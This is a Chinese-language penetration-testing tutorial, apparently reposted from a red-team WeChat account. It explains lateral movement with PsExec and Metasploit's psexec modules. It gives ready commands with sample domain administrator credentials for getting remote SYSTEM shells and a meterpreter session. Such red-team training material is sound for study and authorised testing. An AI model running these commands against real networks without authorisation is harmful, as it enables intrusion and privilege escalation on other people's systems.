专栏首页漏洞知识库横向移动 - PsExec 的使用

横向移动 - PsExec 的使用

PsExec

PsExec 主要用于大批量 Windows 主机的维护,在域环境下效果尤其好。(因为 PsExec 是 Windows 提供的工具,所以杀毒软件将其列入白名单中)

因为使用 PsExec 通过命令行环境与目标机器建立连接,甚至控制目标机器,而不需要通过远程桌面(RDP)进行图形化的控制。

PsExec 包含在 PsTools 工具包中,下载地址:https://download.sysinternals.com/files/PSTools.zip

通过 PsExec 可以在远程目标主机上执行命令,也可以将管理员权限提升到 System 权限以运行指定的程序。

PsExec 的基本原理是:通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘中生成一个名为”PSEXESVC“的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。

PsExec的使用

PsExec的使用


首先,需要获取目标操作系统的交互式 Shell。在建立了 ipc$ 的情况下:

net use \\192.168.3.21 /u:god\administrator Admin12345

执行如下命令,获取 System 权限的 Shell:

PsExec.exe -accepteula \\192.168.3.21 -s cmd.exe

# -accepteula  第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s      以System权限运行远程进程,获得一个System权限的交互式Shell,如果不用这个参数,那么会获得一个administrator权限的shell

获得一个 administrator 权限的 shell:

PsExec.exe -accepteula \\192.168.3.21 cmd.exe

如果没有建立 ipc$,PsExec 有两个参数可以通过指定的账号和密码进行远程连接:

PsExec.exe \\192.168.3.21 -u god\administrator -p Admin12345 cmd.exe

# -u  域\用户名
# -p  密码

使用 PsExec 在远程计算机上执行命令进行回显:

PsExec.exe \\192.168.3.21 -u god\administrator -p Admin12345 cmd /c "ipconfig"

PsExec的注意事项

需要远程系统开启admin共享(默认是开启的),原理是基于IPC共享,目标需要开放445端口和admin

在使用IPC连接目标系统后,不需要输入账户和密码。

在使用PsExec执行远程命令时,会在目标系统中创建一个psexec的服务。命令执行完后,psexec服务将被自动删除。由于创建或删除服务时会产生大量的日志,可以在攻击溯源时通过日志反推攻击流程。

使用PsExec可以直接获得System权限的交互式Shell(前提目标是administrator权限的shell)

在域环境测试时发现,非域用户无法利用内存中的票据使用PsExec功能,只能依靠账号和密码进行传递。


Metasploit 使用 PsExec 模块

查找有关 psexec 的模块:

search psexec

有两个常用的模块:

exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh(Powershell 版本的 psexec)

使用模块:

use exploit/windows/smb/psexec
set rhosts 192.168.2.25
set smbuser administrator
set smbpass Admin12345

运行 exploit ,运行脚本会获得一个 meterpreter:

输入 shell,会获得一个 system 权限的 shell:

psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。


参考文章:

https://zhuanlan.zhihu.com/p/228742108

本文分享自微信公众号 - 渗透攻击红队(RedTeamHacker),作者:渗透攻击红队

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-11-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 横向移动 - smbexec 的使用

    smbexec 可以通过文件共享(admin,c,ipc,d)在远程系统中执行命令。

    渗透攻击红队
  • 横向移动 - WMI 的使用

    自从 PsExec 在内网中被严格监控后,越来越多的反病毒厂商将 PsExec 加入了黑名单,于是黑客们渐渐开始使用 WMI 进行横向移动。

    渗透攻击红队
  • 横向移动之WinRM横向移动

    "Windows远程管理(WinRM)"是WS-Management协议(Web Services for Management,又名WSMan)的Micros...

    黑白天安全
  • 横向移动--SCshell使用Service Manager进行无文件横向移动

    SCShell是无文件横向移动工具,它依赖ChangeServiceConfigA来运行命令。该工具的优点在于它不会针对SMB执行身份验证。一切都通过DCERP...

    黑白天安全
  • OODA:一个提高检测速度与准确度的战术

    本文通过模拟恶意软件使用Microsoft Sysinternals工具PsExec进行横向移动、主机与网络侦察,展示如何使用 OODA循环帮助提高检测速度与准...

    FB客服
  • 横向移动--使用CLSID调用COM对象进行横向

    在第一篇横向移动中我们使用了MMC20.APPLICATION COM对象来进行横向移动,其实我们可以思考一个问题,微软的COM不只有MMC20.APPLICA...

    黑白天安全
  • 由SharpNoPSExec看lateral movement

    Github上发布了一款名叫SharpNoPSExec的工具,地址为https://github.com/juliourena/SharpNoPSExec 主要...

    鸿鹄实验室
  • OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

    近期看了一篇不错的横向移动的文章,觉得不错就简单翻译了一下(谷歌翻译哈哈哈哈!) 原文地址:https://posts.specterops.io/offens...

    黑白天安全
  • 内网渗透 | 横向移动总结

    通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限,这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机,这时候选择横向移动的...

    HACK学习
  • 域渗透不用进程窃取如何横向 Bypass Psexec AV 拿到域控?

    大家好,这里是 渗透攻击红队 的第 63 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • MSSQL横向移动

    使用发现的凭证在环境中横向移动、在时间受限的操作过程中,快速可靠地使用一组新获得的凭据的能力至关重要。这篇博客文章介绍了如何通过MSSQL CLR自动执行横向...

    Khan安全团队
  • 内网渗透测试:内网横向移动基础总结

    在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击...

    FB客服
  • 由浅入深的域渗透系列一(下)

    因为192.168.52.0/24段不能直接连接到192.168.33.3(kali地址),所以需要CS派生smb beacon。让内网的主机连接到win7上。

    重生信息安全
  • WinRM的横向移动详解

    横向的手法从简单的远程桌面协议(rdp)到漏洞利用,手法不断在改变,要对抗的设备产品也不断地变化,有个技术主管问我,红蓝的快乐在于什么?为什么我钟情在红蓝。我想...

    FB客服
  • CS学习笔记 | 19、代码执行的方式

    创建可执行文件可以在 Cobalt Strike 的 Attack -> Packages -> Windows Executable(s) 处进行创建。

    TeamsSix
  • 如何批量在多台服务器上执行命令

    在一些场景里,我们可能需要同时在多台服务器上执行命令,如果一台台登录服务器执行嘛,这效率未免太低了。

    Bypass
  • 横向移动工具WMIHACKER

    WMIHACKER是一款用于远程主机连接工具,通过135端口进行命令执行,执行结果读取以及无需445端口进行文件传输。

    重生信息安全
  • PickleC2 横向移动框架

    PickleC2 是一个用 python3 编写的简单 C2 框架,用于帮助渗透测试人员的社区参与红队活动。

    Khan安全团队
  • 威胁狩猎系列文章之一到三

    这个系列的文章翻译由信安之路红蓝对抗小组的所有成员共同完成,后续将陆续发布,敬请期待!

    信安之路

扫码关注云+社区

领取腾讯云代金券